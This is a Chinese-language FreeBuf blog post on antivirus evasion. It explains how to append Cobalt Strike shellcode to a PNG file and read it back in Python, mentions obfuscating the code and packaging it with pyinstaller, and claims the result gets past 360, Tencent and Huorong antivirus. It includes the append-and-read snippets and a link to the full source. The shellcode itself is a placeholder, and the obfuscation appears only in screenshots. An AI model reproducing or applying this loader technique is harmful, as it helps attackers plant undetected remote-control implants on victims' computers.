freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

Python图片马免杀cobalt strike上线
2023-01-12 02:25:50
所属地 广东省

1673460107_63bef98b32027118316f2.png!small

1673460091_63bef97b4c05c58141c12.png!small

过了360,腾讯,火绒,正常上线cobalt strike,来说一下免杀原理

主要使用的是图片马

首先创建一个给图片加马的脚本,准备一张照片,取名a.png

list = b"...shellcode"
png = open('a.png','ab+')#追加写入
png.write(list)
png.close()
print('写入完成')

在图片最后写入shellcode的二进制编码

然后创建一个读取马的脚本

png = open('a.png','rb')#二进制方式读取
shellcode = png.read()[-892:]#这里是shellcode的长度

然后给她睡一会也行,给她加个base64也行,这里我选择了python的一个奇怪的特性

一开始怎么加密都过不了火绒,然后就使用了函数加密

1673460759_63befc17c2f0f6c3631de.png!small

看起来是不是很混乱

1673460787_63befc339bbd60b852e3d.png!small

这是解密区

1673489781_63bf6d7510db980ed6b6d.png!small

最后用pyinstaller生成一下

1673489855_63bf6dbfe3ed9da7a1ca0.png!small

正常过360,火绒,腾讯管家

这些源码已上传至git

https://github.com/soryecker/PicBypass

# 免杀 # 远控免杀 # shellcode免杀 # 免杀木马 # 免杀火绒
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者